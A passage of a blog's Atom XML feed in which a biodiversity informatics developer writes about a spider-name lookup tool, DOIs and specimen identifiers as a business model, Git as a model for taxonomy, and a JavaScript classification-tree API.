Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2447577862331964825</id><published>2008-04-15T05:42:00.003-06:00</published><updated>2008-04-15T05:54:41.566-06:00</updated><title type='text'>Just Gimme the Current Name!</title><content type='html'>As a graduate student who collected a bunch of names to be stuffed into an Appendix, I found it was not a trivial task to ensure the names I used were the currently recognized nomenclature. One of the first things a reviewer of any publication containing an Appendix of names will do is check that the names are all correct. In spider circles, that means several dozen trips to Norm Platnick's &lt;a href="http://research.amnh.org/entomology/spiders/catalog/"&gt;World Spider Catalog&lt;/a&gt;. It would be so much easier for everyone involved if Norm had one big text box in which people could paste all the names and have every name be cross-checked with what is in the Catalog.&lt;br /&gt;&lt;br /&gt;Coincidentally, it appears that many people who visit the Nearctic Spider Database use its search box to just get the full name string. I wonder how many searches on Google are the same! So, I made one. Sure, there are programmatic issues. But, I can catch those names that might potentially be ambiguous and tell you about them. I can also tell you if you misspelled a name or if a name you searched on isn't in the Nearctic Spider Database...remember that the database is regionally centric...and someone (me!) has to keep on top of potential species introductions, treatments, etc. 
because any checklist or database will never be complete.&lt;br /&gt;&lt;br /&gt;So, give it a shot:&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/data/canada_spiders/NameSpider.asp"&gt;&lt;img style="cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SASXEJZftwI/AAAAAAAAAFE/2L732Quc7KI/s400/search.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5189438768135780098" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2447577862331964825?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/2447577862331964825/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2447577862331964825' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2447577862331964825'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2447577862331964825'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/04/just-gimme-current-name.html' title='Just Gimme the Current Name!'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/SASXEJZftwI/AAAAAAAAAFE/2L732Quc7KI/s72-c/search.jpg' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3044087211698183030</id><published>2008-03-26T20:34:00.003-06:00</published><updated>2008-03-26T20:59:18.746-06:00</updated><title type='text'>I Got Useful Data...and Caught You Unaware</title><content type='html'>A recent reply to a post in Taxacom got me thinking more deeply about capturing workflows (see &lt;a href="http://mailman.nhm.ku.edu/pipermail/taxacom/2008-March/026834.html"&gt;thread&lt;/a&gt;):&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;The 'becomes part of daily routines on the workdesks of experts' is a&lt;br /&gt;crucial part of this 'revolution' - the few experts left need an&lt;br /&gt;incentive to abandon their word processors/spreadsheets/databases and&lt;br /&gt;the incentive would be a workdesk with all the comfort factors that&lt;br /&gt;these software applications give them and a whole heap of bonus&lt;br /&gt;attributes which make it a no-brainer to adopt ... If (big if) the&lt;br /&gt;majority of experts used this workdesk the&lt;br /&gt;adSense-like/referral/ebay-feedback stuff going on in the background&lt;br /&gt;would automatically improve the GBIF (and others - EoL??) content. The&lt;br /&gt;good stuff rises the bad stuff falls - its always been this way, based&lt;br /&gt;on a traditionally  published monograph/fauna/flora/mycota/biota&lt;br /&gt;typically on a 10-25 year cycle; in the 21st century digital age it&lt;br /&gt;should be a tad quicker.&lt;br /&gt;&lt;br /&gt;Paul&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;I'm happy to hear people are beginning to think of a "workdesk" as I envision the EOL WorkBench, which coincidentally I am internally calling "LifeDesk". This is how I described it some time ago on Taxacom (&lt;a href="http://mailman.nhm.ku.edu/pipermail/taxacom/2007-May/025491.html"&gt;here&lt;/a&gt;). 
My thinking has shifted somewhat since then, but the give &amp; take concept still holds.&lt;br /&gt;&lt;br /&gt;A few concrete examples:&lt;br /&gt;&lt;br /&gt;I modified my twirly, AJAXy reference look-up tool (also present on some exemplar EOL species pages like &lt;a href="http://www.eol.org/taxa/16252751"&gt;this one&lt;/a&gt;) to actually store the reprint metadata from CrossRef before it gets passed through to the user. The user gets the benefit of knowing there's a reprint available to download - they just click the little icon a second time - and I get the benefit of all the metadata for later use.&lt;br /&gt;&lt;br /&gt;In doing some reading and fumbling with Adobe AIR, I stumbled across &lt;a href="http://gasi.ch/blog/2007/11/19/photospread-a-spreadsheet-for-managing-photos/"&gt;PhotoSpread&lt;/a&gt; (&lt;a href="http://dbpubs.stanford.edu:8090/pub/showDoc.Fulltext?lang=en&amp;doc=2007-28&amp;format=pdf&amp;compression=&amp;name=2007-28.pdf"&gt;PDF&lt;/a&gt;). This app is a clever hybrid between Excel and Flickr. Dragging/dropping images coordinates regroupings or filters. As a consequence, metadata tags are automatically created.&lt;br /&gt;&lt;br /&gt;So, while I think a "WorkBench", "WorkDesk", or "LifeDesk" focus for development is in the right direction, we should be looking for shortcuts like these that capture user activity, use third party APIs in the background, and later repurpose the data in other interesting ways. 
If we are going to parasitize systematists' workflows, we had best get every ounce of potential data out of the time they consume.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3044087211698183030?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3044087211698183030/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3044087211698183030' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3044087211698183030'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3044087211698183030'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/03/i-got-useful-dataand-caught-you-unaware.html' title='I Got Useful Data...and Caught You Unaware'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6223979699933606209</id><published>2008-03-16T08:01:00.004-06:00</published><updated>2008-03-16T08:42:25.304-06:00</updated><title type='text'>Where's David?</title><content type='html'>It has been an exceptionally long time since the last post. 
But, there were a few life-changing events that took precedence.&lt;br /&gt;&lt;br /&gt;For starters, I'm now the WorkBench project leader for the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; and am living on Cape Cod with my family.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?ie=UTF8&amp;amp;hl=en&amp;amp;msa=0&amp;amp;ll=41.529142,-70.643635&amp;amp;spn=0.048833,0.114155&amp;amp;msid=116660870661584453925.0004488e97e989dee189e&amp;amp;output=embed&amp;amp;s=AARTsJrNAOnuENfkWUUGxJEsaeaSJvAMsQ"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org"&gt;The Canadian Arachnologist&lt;/a&gt; and &lt;a href="http://www.spiderwebwatch.org"&gt;Spider WebWatch&lt;/a&gt; sites are still served from a desktop server. But, I have passed the editorial torch for the &lt;a href="http://www.canadianarachnology.org/newsletters/"&gt;newsletter&lt;/a&gt; to &lt;a href="http://www.canadianarachnology.org/members/77.htm"&gt;Dr. Robin Leech&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I am also in the midst of buying my first home, which is no end of fun. Banks are quick to take your money, but aren't so quick to give it away, especially if your credit rating is invisible from the other side of an international border.&lt;br /&gt;&lt;br /&gt;Just to prove that I have been toying with new things, here's a list containing a taste of things to come with the EOL WorkBench, which by the way I'm pushing for a rename. I'll let you fill in the blanks... 
;)~&lt;br /&gt;&lt;br /&gt;&lt;a href="http://drupal.org"&gt;Drupal&lt;/a&gt;&lt;br /&gt;&lt;a href="http://extjs.com/"&gt;ExtJS&lt;/a&gt;&lt;br /&gt;&lt;a href="http://search.cpan.org/~mjewell/Biblio-Citation-Parser-1.10/"&gt;Biblio::Citation::Parser&lt;/a&gt;&lt;br /&gt;&lt;a href="http://dev.jquery.com/view/trunk/plugins/autocomplete/"&gt;jQuery multiple autocomplete&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6223979699933606209?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6223979699933606209/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6223979699933606209' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6223979699933606209'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6223979699933606209'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/03/wheres-david.html' title='Where&apos;s David?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1815855504121332473</id><published>2007-10-30T14:06:00.000-06:00</published><updated>2007-10-30T15:06:33.176-06:00</updated><title type='text'>Taxonomic Consensus as Software Creation</title><content type='html'>It occurred to me today that the process of reaching taxonomic consensus or developing a master database of vetted names like 
that undertaken by &lt;a href="http://www.catalogueoflife.org/search.php"&gt;The Catalogue of Life Partnership&lt;/a&gt; (CoLP) is not unlike software development that necessarily requires some sort of framework to manage versioning. However, taxonomic activities and building checklists do not currently have a development framework. We likely have a set of rules and guidelines, but infighting and bickering no doubt fragment interest groups, which ultimately leads to the stagnation, abandonment, and eventual distrust of big projects like CoLP. We have organizations like the &lt;a href="http://www.iczn.org/"&gt;International Commission on Zoological Nomenclature&lt;/a&gt; to manage the act of naming animals but there is nothing concrete out the other end to actually organize the names. Publications are merely the plums in a massive bowl of pudding. And, it is equally frustrating to actually find these publications. One way to approach a solution to this is to equate systematics with perpetual software development where subgroups manage branches of the code and occasionally perform commits to (temporarily) lock the code. Like with software development, groups of files (&lt;em&gt;i.e.&lt;/em&gt; branches on the tree of life) and the files themselves (&lt;em&gt;i.e.&lt;/em&gt; publications, images, genomic data, etc.) ought to be tracked with unique identifiers and time-stamps. 
This would be a massively complex shift in how taxonomic business is conducted, but what other solution is there?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RyeWwgTYUfI/AAAAAAAAAE8/oV7qklG0pps/s1600-h/git-logo.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RyeWwgTYUfI/AAAAAAAAAE8/oV7qklG0pps/s320/git-logo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5127232460833706482" /&gt;&lt;/a&gt;Without really understanding distributed environments in software development...it's too geeky for me...I spent a few moments watching a Google TechTalk presentation by Randal Schwartz delivered at Google October 12, 2007 about &lt;a href="http://git.or.cz/"&gt;Git&lt;/a&gt;, a project spearheaded by Linus Torvalds: &lt;a href="http://video.google.com/videoplay?docid=-1019966410726538802"&gt;http://video.google.com/videoplay?docid=-1019966410726538802&lt;/a&gt; (sorry, embedding has apparently been disabled by request). &lt;br /&gt;&lt;br /&gt;There are some really interesting parallels between distributed software development environments like Git and what we ought to be working toward in systematics, especially as we move toward using Life Sciences Identifiers (LSIDs). 
Here are a few summarized points from Randal's presentation:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Git manages changes to a tree of files over time&lt;/li&gt;&lt;li&gt;Optimized for large file sets and merges&lt;/li&gt;&lt;li&gt;Encourages speculation with the construction of trial branches&lt;/li&gt;&lt;li&gt;Anyone can clone the tree, make &amp; test local changes&lt;/li&gt;&lt;li&gt;Uses "Universal Public Identifiers"&lt;/li&gt;&lt;li&gt;Has multi-protocol transport like HTTP and SSH&lt;/li&gt;&lt;li&gt;One can navigate back in time to view older trees of file sets via universal public identifiers&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;With a cross-platform solution and a facile user interface, perhaps thinking in these terms will help engage taxonomists and will ultimately lead to a &lt;a href="http://www.zoobank.org"&gt;ZooBank&lt;/a&gt; global registry of new taxon names.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1815855504121332473?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1815855504121332473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1815855504121332473' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1815855504121332473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1815855504121332473'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/taxonomic-consensus-as-software.html' title='Taxonomic Consensus as Software Creation'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' 
height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RyeWwgTYUfI/AAAAAAAAAE8/oV7qklG0pps/s72-c/git-logo.png' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6909101399848292199</id><published>2007-10-25T10:17:00.000-06:00</published><updated>2007-10-25T13:31:34.918-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><category scheme='http://www.blogger.com/atom/ns#' term='BHL'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>Buying &amp; Selling DOIs...and the same for specimens</title><content type='html'>A &lt;a href="http://ispiders.blogspot.com/2007/10/biodiversity-informatics-needs-business.html"&gt;previous post&lt;/a&gt; of mine described the business model for digital object identifiers in albeit simplistic terms. But, perhaps I should back up a second. Just what the heck is a DOI and why should the average systematist care? [Later in this post, I'll describe an interesting business model for biodiversity informatics]&lt;br /&gt;&lt;br /&gt;Rod Page &lt;a href="http://iphylo.blogspot.com/2007/10/bhl-and-dois.html"&gt;recently wrote a post&lt;/a&gt; in iPhylo that does a great job of selling the concept. Permit me to summarize and to add my own bits:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;DOIs are strings of numbers &amp; letters that uniquely identify something in the digital realm. In the case of published works, they uniquely identify that work.&lt;/li&gt;&lt;li&gt;DOIs are resolvable and can be made actionable. i.e. 
you can put http://dx.doi.org/ in front of a DOI and, through the magic of HTTP, you get redirected to the publisher's offering or the PDF or HTML version of the paper&lt;/li&gt;&lt;li&gt;DOIs have metadata. If you have for example a citation to a reference, you can obtain the DOI. Conversely, if you have a DOI, you can get the metadata&lt;/li&gt;&lt;li&gt;DOIs are a business model. Persistent URLs (championed by many) are not a business model because there is no transfer of funds &amp; confidences&lt;/li&gt;&lt;br /&gt;&lt;/ol&gt;&lt;br /&gt;Systematists have lamented that their works on delineating &amp; describing species don't get cited in the primary literature. If they published in journals that stamped DOIs on their works or if they participated in helping journals get DOIs for back-issues or future publications, then outfits like the &lt;a href="http://www.biodiversitylibrary.org/"&gt;Biodiversity Heritage Library&lt;/a&gt; would have an easier time mapping taxon names to published works. For example, searching not for a publication but a taxon name in Biodiversity Heritage Library (prototype &lt;a href="http://www.biodiversitylibrary.org/NameSearch.aspx"&gt;HERE&lt;/a&gt;) would not only provide a list of works in BHL that used the name somewhere in its text, it could provide a &lt;a href="http://www.crossref.org/02publishers/forward_linking_howto.html"&gt;forward-linking gadget&lt;/a&gt; from CrossRef. 
The end user would have an opportunity to do his or her own cognitive searching:&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ijLDxgALc2c&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ijLDxgALc2c&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;There is nothing stopping an outfit like the Biodiversity Heritage Library from using Handles or some other globally unique identifier. But, doing so cuts off the possibility of injecting old works back into contemporary use because they will not be embedded into a widely used cross-linking framework.&lt;br /&gt;&lt;h2&gt;MOIs for Sale&lt;/h2&gt;&lt;br /&gt;The Global Biodiversity Information Facility and The Encyclopedia of Life must also be active participants in the adoption of globally unique identifiers. But again, there must be a business model. So, here's a business model in relation to museum specimens:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;A registry sells a "MOI" - Museum Object Identifier (my creation of course) at 1 cent per labelled specimen.&lt;/li&gt;&lt;li&gt;The price will go up to 2 cents a specimen after 2020, the usual year given for various National Biodiversity Strategies. Translation: get your act together because it'll cost more later.&lt;/li&gt;&lt;li&gt;All MOIs must have DarwinCore metadata&lt;/li&gt;&lt;li&gt;The registry sets up a resolver identical in functionality to DOIs&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;Now, before all the curators out there scream bloody murder, let's stop and think about this and put a creative, financial spin on the possibilities. 
Craig Newmark, the founder of the ever popular Craigslist, was recently interviewed on Stephen Colbert's &lt;em&gt;Colbert Report&lt;/em&gt; where he mentioned &lt;a href="http://www.donorschoose.org"&gt;DonorsChoose&lt;/a&gt; (&lt;a href="http://www.indecision2008.com/blog.jhtml?c=vc&amp;videoId=121749"&gt;see interview&lt;/a&gt;). If you're not familiar with that new service, here's the slogan: "Teachers ask. You choose. Students learn."  &lt;blockquote&gt;DonorsChoose.org is a simple way to provide students in need with resources that our public schools often lack. At this not-for-profit web site, teachers submit project proposals for materials or experiences their students need to learn. These ideas become classroom reality when concerned individuals, whom we call Citizen Philanthropists, choose projects to fund.&lt;/blockquote&gt;&lt;br /&gt;There's a lot of interest in The Encyclopedia of Life and the Biodiversity Heritage Library now. Let's set up a global "DonorsChoose" clone called something like "Biodiversity Knowledge Fund" (though that's not catchy enough) to be locally administered by daughter organizations to EOL and the BHL in countries throughout the world. Funds then are transferred to institutions of the donor's choosing. Museums then accept the funds donated to them and turn around and buy "MOIs". What would prevent a museum from taking the money specifically donated to them and spending it on things other than MOIs? Nothing. But, their specimens then aren't indexed. Are you a philanthropist or have 20 dollars (or francs, rubles, pounds, pesos, dinar, lira, &lt;em&gt;etc.&lt;/em&gt;) you'd like to donate? Want to fund biodiversity but don't know how? Here's an answer. But is such a "Biodiversity Knowledge Fund" sustainable? 
No, but it's a start.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6909101399848292199?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6909101399848292199/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6909101399848292199' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6909101399848292199'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6909101399848292199'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/buying-selling-doisand-same-for.html' title='Buying &amp; Selling DOIs...and the same for specimens'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8923159062614006286</id><published>2007-10-24T13:23:00.000-06:00</published><updated>2007-10-25T13:32:20.812-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOI'/><category scheme='http://www.blogger.com/atom/ns#' term='GUIDs'/><category scheme='http://www.blogger.com/atom/ns#' term='CrossRef'/><title type='text'>Biodiversity Informatics Needs a Business Model</title><content type='html'>Publishers and (most) librarians understand that digital object identifiers (doi) associated with published works are more than just persistent codes that uniquely identify items. 
They are built into the social fabric of the publishing industry. Because monies are transferred for the application and maintenance of a doi, the identifier is persistent. It's really because of this "feature" that tools like cross-linking and forward-linking can be built and that these new tools will themselves persist. The nascent biodiversity informatics community is attempting to do all the fun stuff (myself included) like building taxonomic indices, gadgetry to associate names and concepts with other things like literature, images, and specimens without first establishing a long-term solution for how the persistence of all these new tools will be established. Let me break it down another way:&lt;br /&gt;&lt;br /&gt;Publishers buy dois and pay an annual subscription. In turn, the extra fee for the doi is passed down the chain to the journal &amp; its society. The society then passes the extra fees on to either an author in the way of page fees or to the subscribers of the journal. Since the majority of subscribers are institutions and authors receive research grants from federal agencies, ultimately, the fractions of pennies that merge to pay for a single doi come from tax payers' wallets and purses. So, dois fit nicely into the fabric of society and really do serve a greater purpose than merely uniquely identifying a published object. Then, and only then, can the nifty tools CrossRef provides be made available. Then, third parties may use these tools with confidence.&lt;br /&gt;&lt;br /&gt;Not surprisingly, the biodiversity informatics community has latched on to the nifty things one can do with globally unique identifiers because everybody wants to "do things" by connecting one another's resources. Some very important and extremely interesting answers to tough questions can only be obtained by doing this work. 
Also not surprisingly, there is now a mess of various kinds of supposed globally unique identifiers (GUIDs) because big players want to be &lt;em&gt;the&lt;/em&gt; clearinghouse much as CrossRef is &lt;em&gt;the&lt;/em&gt; clearinghouse for dois. But they have all missed the point.&lt;br /&gt;&lt;br /&gt;So, how do we instill confidence in the use of LSIDs, ITIS TSNs, the various NCBI database id's, &lt;em&gt;etc.&lt;/em&gt; without a heap of silos with occasional casualties? Get rid of them or at least clearly associate what kind of object gets what kind of identifier along with a business model where there will be persistent, demonstrable transfer of funds. The use of Semantic Web tools is merely a band-aid for a gushing wound. When I say persistent transfer of funds, I don't mean assurances that monies will come from federal grants or wealthy foundations in order to maintain those identifiers. I mean an identifier that is woven into the fabric and workflow of the scientific community. This may be easier said than done because the scientific community (especially systematists and biologists) isn't in the business of producing &lt;em&gt;anything&lt;/em&gt; tangible except publications. CrossRef has that angle very well covered. So, what else do scientists (the systematics community is what I'm most interested in) produce that can be monetized? Specimens, gene sequences, and perhaps a few other objects. We need several non-profits like CrossRef with the guts to demand monies for the assignment of persistent identifiers. Either we adopt this as a business model or we monetize some services (e.g. 
something like Amazon Web Services as &lt;a href="http://ispiders.blogspot.com/2007/06/digir-for-collectors.html"&gt;previously discussed&lt;/a&gt;) that directly, clearly, and unequivocally feed into the maintenance of all the shiny new GUIDs.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8923159062614006286?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8923159062614006286/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8923159062614006286' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8923159062614006286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8923159062614006286'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/10/biodiversity-informatics-needs-business.html' title='Biodiversity Informatics Needs a Business Model'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-23452652721988975</id><published>2007-10-16T23:58:00.000-06:00</published><updated>2007-10-17T01:30:07.257-06:00</updated><title type='text'>PygmyBrowse Classification Tree API</title><content type='html'>Yay, a new toy! This one ought to be useful for lots of biodiversity/taxonomic web sites. 
First, I'll let you play with it (click the image):&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/pygmy/GBIF.htm"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RxW5q4CWvNI/AAAAAAAAAE0/_e7Mdc2aDFs/s320/trees.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5122204297451715794" /&gt;&lt;/a&gt;&lt;br /&gt;Seems I always pick up where &lt;a href="http://iphylo.blogspot.com/"&gt;Rod Page&lt;/a&gt; leaves off. Not sure if this is a good thing or not. However, we do have some worthwhile synergies. Rod has cleaned up and simplified his old (Sept. 2006) &lt;a href="http://iphylo.blogspot.com/2006/09/pygmybrowse.html"&gt;version of PygmyBrowse&lt;/a&gt;. Earlier this week, he made an &lt;a href="http://iphylo.blogspot.com/2007/10/pygmybrowse-gbif-classification.html"&gt;iframe version&lt;/a&gt; and put it on his iPhylo blog. Like Rod, I dislike a lot of the classification trees you come across on biodiversity/taxonomic web sites because these ever-expanding monstrosities eventually fill the screen and are a complete mess. When you click a hyperlinked node, you often have to wait while the page reloads and the tree re-roots itself...not pretty. Trees are supposed to simplify navigation and give a sense of just how diverse life on earth really is. The &lt;a href="http://developer.yahoo.com/yui/treeview/"&gt;Yahoo YUI TreeView&lt;/a&gt; is OK because it's dynamic, but it desperately needs to handle overflow for exceptionally large branches as is the case with classification trees in biology. What did I do that's different from Rod's creation?&lt;br /&gt;&lt;br /&gt;I convinced Dave Martin (&lt;a href="http://www.gbif.org"&gt;GBIF&lt;/a&gt;) to duplicate the XML structure Rod used to fill the branches in his PygmyBrowse and to also do the same with JSON outputs. 
This is the beta &lt;a href="http://wiki.gbif.org/dadiwiki/wikka.php?wakka=ClassificationSearchAPI"&gt;ClassificationSearchAPI&lt;/a&gt;, which will soon be available from the main GBIF web services offerings. When the service is out of beta, I'll just adjust one quick line in my code.&lt;br /&gt;&lt;br /&gt;I jumped at the chance to preserve the functionality Rod has in his newly improved, traditional XMLHTTP-based PygmyBrowse and rewrite it as an object-oriented, JavaScript/JSON-based version. My goal is to have a very simple API for developers and end users who wish to have a remotely obtained, customizable classification tree on their websites. Plus, I want this API to accept an XML file containing taxon name and URL elements (e.g. a &lt;a href="https://www.google.com/webmasters/tools/docs/en/protocol.html"&gt;Google sitemap&lt;/a&gt;) such that the API will parse it and adjust the behaviour of the links in the tree. In other words, just like you can point the Google Map API to an XML file containing geocoded points for pop-ups, I wanted to author this API to grab an XML file and magically insert little, clickable icons next to nodes or leaves that have corresponding web pages on my server. Think of this as a hotplugged, ready-made classification navigator. This is something you cannot do with an iframe version because it's stuck on the server and you can't stick your fingers in it and play with it. Sorry, Rod.&lt;br /&gt;&lt;br /&gt;The ability to feed an XML file to the tree isn't yet complete, but the guts are all in place in the JavaScript. You can specify a starting node (homonym issues haven't yet been dealt with but I'll do that at some point), the size of the tree, the classification system to use (e.g. Catalogue of Life: 2007 Annual Checklist or Index Fungorum, among others), and you can have as many of these trees on one page as you wish. You just have to pray GBIF servers don't collapse under the strain. 
